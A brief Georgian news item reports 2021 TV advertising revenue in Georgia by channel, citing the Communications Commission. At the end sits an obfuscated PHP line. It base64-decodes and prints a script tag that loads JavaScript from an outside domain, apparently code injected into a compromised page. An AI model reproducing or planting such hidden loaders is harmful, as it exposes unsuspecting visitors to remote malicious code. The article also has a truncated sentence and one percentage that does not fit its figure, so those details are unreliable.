celsiusi
ავერსი შნაიდერი
2021 წელს სატელევიზიო მაუწყებლების სარეკლამო შემოსავლები 2020 წელთან შედარებით 30%-ით გაიზარდა.
 
კომუნიკაციების კომისიის ინფორმაციით, 2021 წელს სატელევიზიო მაუწყებლების სარეკლამო შემოსავლები. სარეკლამო შემოსავლების საერთო მოცულობამ 2021 წელს 79.8 მილიონი ლარი შეადგინა, 2020 წელს კი აღნიშნული მაჩვენებელი 61.4 მილიონი ლარი იყო. ამრიგად, მაუწყებლების სარეკლამო შემოსავლები 18.4 მილიონი ლარით არის გაზრდილი.
 
სარეკლამო შემოსავლები გულისხმობს: კომერციულ რეკლამას, სპონსორობას, ტელეშოპინგს, ფასიან პროდუქტისა და განცხადებების განთავსებას.
 
სარეკლამო შემოსავლები სატელევიზიო არხების მიხედვით ასე გადანაწილდა: 
 
1. იმედი - 27.3 მლნ, საერთო მოცულობის 34.3%
2. მთავარი არხი - 11.4 მლნ, 14.4%
3. რუსთავი 2 - 10.4 მლნ, 13.1%
4. TV პირველი - 6.3 მლნ, 8.0%
5. ფორმულა - 5.7 მლნ, 7.2%
6. POSTV - 4.5 მლნ, 5.7%
7. სილქნეტი - 3.5 მლნ, 4.4%
8. GDS - 3.2 მლნ, 3.2%
9. პირველი არხი - 2.4 მლნ, 3.1%
10. რ.ბ.ჯ - 0.6 მლნ, 0.8%
11. სხვა - 4.7 მლნ, 6%
 
 
766
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");